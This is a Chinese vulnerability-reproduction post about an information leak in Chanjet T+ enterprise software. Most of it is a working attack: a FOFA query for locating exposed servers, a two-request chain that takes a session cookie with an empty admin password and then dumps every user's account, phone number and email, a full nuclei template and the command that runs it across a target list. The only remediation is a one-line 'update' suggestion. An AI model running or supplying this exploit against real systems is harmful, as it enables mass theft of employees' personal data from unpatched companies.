畅捷通T+ getdecallusers信息泄露漏洞复现 nuclei poc

admin 2024年2月15日15:36:39评论111 views字数 2249阅读7分29秒阅读模式

使

01

漏洞名称

畅捷通T+ getdecallusers信息泄露漏洞

02

漏洞影响

畅捷通T+

畅捷通T+ getdecallusers信息泄露漏洞复现 nuclei poc

03

漏洞描述

畅捷通是用友集团的成员企业,旨在为企业提供全面的财务管理解决方案。作为畅捷通的核心产品,好业财是一款高效、稳定、易用的财务管理工具,它可以帮助企业快速建立财务管理体系,提升财务管理效率。T+是用友畅捷通推出的一款新型互联网企业管理系统,T+能够满足成长型小微企业对其灵活业务流程的管控需求,重点解决往来业务管理、订单跟踪、资金、库存等管理难题。用户可以通过各种固定或移动设备随时随地迅速获取企业实时、动态的运营信息。

该系统存在信息泄露漏洞,导致所有用户账号电话号码以及邮箱泄露。

04

资产FOFA搜索语句
app="畅捷通-TPlus"

畅捷通T+ getdecallusers信息泄露漏洞复现 nuclei poc

05

漏洞复现

第一步,通过

/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie

畅捷通T+ getdecallusers信息泄露漏洞复现 nuclei poc

第二步,利用获取到的Cookie请求

/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers接口

畅捷通T+ getdecallusers信息泄露漏洞复现 nuclei poc

06

nuclei poc

id: yonyou-chanjet-tplus-getdecallusers-infoleakinfo:  name: 畅捷通T+ getdecallusers信息泄露漏洞  author: fgz  severity: high  description: |    T+是用友畅捷通推出的一款新型互联网企业管理系统,T+能够满足成长型小微企业对其灵活业务流程的管控需求,重点解决往来业务管理、订单跟踪、资金、库存等管理难题。用户可以通过各种固定或移动设备随时随地迅速获取企业实时、动态的运营信息。该系统存在漏洞,导致所有用户账号电话号码以及邮箱泄露  reference:    None  metadata:    verified: true    max-request: 2    fofa-query: app="畅捷通-TPlus"  tags: chanjet,infoleakhttp:  - raw:      - |        POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword HTTP/1.1        Host: {{Hostname}}        User-Agent: Opera/8.16.(X11; Linux i686; nn-NO) Presto/2.9.183 Version/12.00        Accept-Encoding: gzip, deflate        Accept: */*        Connection: close        Content-Length: 278        Content-Type: application/json        {"AccountNum": "000", "UserName": "admin", "Password": "", "rdpYear": "2023", "rdpMonth": "5", "rdpDate": "17", "webServiceProcessID": "admin", "ali_csessionid": "", "ali_sig": "", "ali_token": "", "ali_scene": "", "role": "", "aqdKey": "", "fromWhere": "browser", "cardNo": ""}      - |        POST /tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers HTTP/1.1        Host: {{Hostname}}        User-Agent: Opera/8.16.(X11; Linux i686; nn-NO) Presto/2.9.183 Version/12.00        Accept-Encoding: gzip, deflate        Accept: */*        Connection: close        Content-Length: 54        Content-Type: application/json        {"condition": "", "accNum": "", "onlyBuying": "false"}    cookie-reuse: true    matchers:      - type: dsl        dsl:          - "status_code_1 == 200 && contains((body_1), 'error')"          - "status_code_2 == 200 && contains((body_2), 'UserId')"        condition: and

运行脚本

.nuclei.exe -t .yonyou-chanjet-tplus-getdecallusers-infoleak.yaml -l .1.txt -me result

畅捷通T+ getdecallusers信息泄露漏洞复现 nuclei poc

07

修复建议

更新到最新版本

原文始发于微信公众号(AI与网安):畅捷通T+ getdecallusers信息泄露漏洞复现 nuclei poc

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月15日15:36:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   畅捷通T+ getdecallusers信息泄露漏洞复现 nuclei pochttps://cn-sec.com/archives/2190213.html

发表评论

匿名网友 填写信息